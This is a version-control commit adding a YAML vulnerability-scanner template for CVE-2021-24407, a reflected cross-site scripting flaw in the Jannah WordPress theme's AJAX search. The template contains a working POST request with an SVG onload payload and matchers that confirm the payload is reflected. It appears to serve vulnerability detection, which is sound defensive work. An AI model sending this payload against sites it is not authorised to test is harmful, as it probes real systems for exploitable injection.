Create CVE-2021-24407.yaml

2021-09-15 11:51:50 +07:00 · 2021-09-15 11:51:50 +07:00 · 936ec94e23
parent 04ab1bb769
commit 936ec94e23
1 changed files with 38 additions and 0 deletions
--- a/cves/2021/CVE-2021-24407.yaml
+++ b/cves/2021/CVE-2021-24407.yaml
@ -0,0 +1,38 @@
+id: CVE-2021-24407
+
+info:
+  name: Jannah < 5.4.5 - Reflected Cross-Site Scripting (XSS)
+  author: pikpikcu
+  severity: medium
+  description: he Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24407
+  tags: cves,cve2021,wordpress,xss
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded
+        
+        action=tie_ajax_search&query[]=<svg+onload=alert(document.domain)> 
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - '<svg+onload=alert(document.domain)>'
+        part: body
+
+      - type: word
+        words:
+          - 'Content-Type: text/html'
+        part: header
+
+      - type: status
+        status:
+          - 200